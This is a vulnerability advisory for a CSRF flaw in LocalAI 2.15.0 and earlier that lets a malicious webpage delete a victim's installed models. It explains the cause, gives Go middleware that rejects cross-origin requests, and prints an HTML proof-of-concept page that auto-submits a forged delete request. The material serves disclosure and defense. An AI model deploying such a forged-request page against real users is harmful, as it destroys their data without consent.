CSRF Vulnerability Allowing Deletion of Installed Models
A Cross-Site Request Forgery (CSRF) vulnerability in LocalAI versions up to and including 2.15.0 allows attackers to trick victims into deleting installed models. A proof of concept (PoC) demonstrated the issue: when a victim interacts with a malicious webpage, the model `gpt-4-vision-preview` is deleted from their LocalAI instance. The advisory does not name the specific patched version, so users should update to a release later than 2.15.0.
Available publicly on Jul 06 2024
Threat Overview
The vulnerability stems from the application's failure to validate the authenticity of requests that perform critical actions, such as deleting installed models. Because the server cannot distinguish a request the user intended from one forged by a third-party page, an attacker can craft a malicious webpage that, when visited by an authenticated user, triggers unauthorized actions without that user's consent. The impact is significant: important data (models) can be lost, potentially disrupting operations for users who rely on the affected software.
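One standard defense is to reject state-changing requests whose `Origin` header does not match the application's own origin (or to require a per-session CSRF token). The following Go sketch illustrates the idea using only the standard library; it is not LocalAI's actual code, and the route, port, and allowed origin are assumptions for illustration:

```go
package main

import (
	"log"
	"net/http"
)

// allowedOrigin is an assumption for illustration; a real deployment
// would derive this from configuration.
const allowedOrigin = "http://localhost:8080"

// requireSameOrigin is CSRF-protection middleware: it rejects state-changing
// requests whose Origin header is missing or points at a foreign site.
func requireSameOrigin(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodGet && r.Method != http.MethodHead {
			if r.Header.Get("Origin") != allowedOrigin {
				http.Error(w, "cross-origin request rejected", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	mux := http.NewServeMux()
	// Hypothetical stand-in for the real model-delete route.
	mux.HandleFunc("/delete/model", func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte("model deleted\n"))
	})
	log.Fatal(http.ListenAndServe(":8080", requireSameOrigin(mux)))
}
```

With a check like this in place, a forged POST from an attacker's page carries the attacker's origin and is refused, while same-origin requests from the legitimate WebUI pass through.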
Attack Scenario
An attacker crafts a webpage containing a form that, when submitted, sends a POST request instructing the LocalAI application to delete a specific model. The attacker then lures a victim to this page, whether through phishing emails, social engineering, or by embedding the page in a site the victim already visits. On page load, JavaScript submits the form automatically, and the model is deleted without the victim's knowledge or explicit consent, as in the sketch below.
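A minimal PoC page might look like the following sketch. The port and delete route in the form's `action` are assumptions for illustration (8080 is LocalAI's default port; the exact route may differ between versions), not a confirmed excerpt from the original report:

```html
<!-- Hypothetical CSRF PoC. The action URL below is an assumption for
     illustration; the real delete route may differ between versions. -->
<html>
  <body>
    <form id="csrf-poc" method="POST"
          action="http://localhost:8080/browse/delete/model/gpt-4-vision-preview">
    </form>
    <script>
      // Submit as soon as the victim's browser loads the page; the browser
      // sends the cross-site POST along with any ambient credentials.
      document.getElementById("csrf-poc").submit();
    </script>
  </body>
</html>
```

Because the request originates from the victim's own browser, it carries any session cookies for the LocalAI host, and a server without CSRF checks processes it as if the victim had clicked delete themselves.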
Who is affected
Any authenticated user of LocalAI version 2.15.0 or earlier who interacts with a malicious webpage crafted by an attacker is at risk. This includes individuals and organizations using LocalAI for managing and deploying AI models.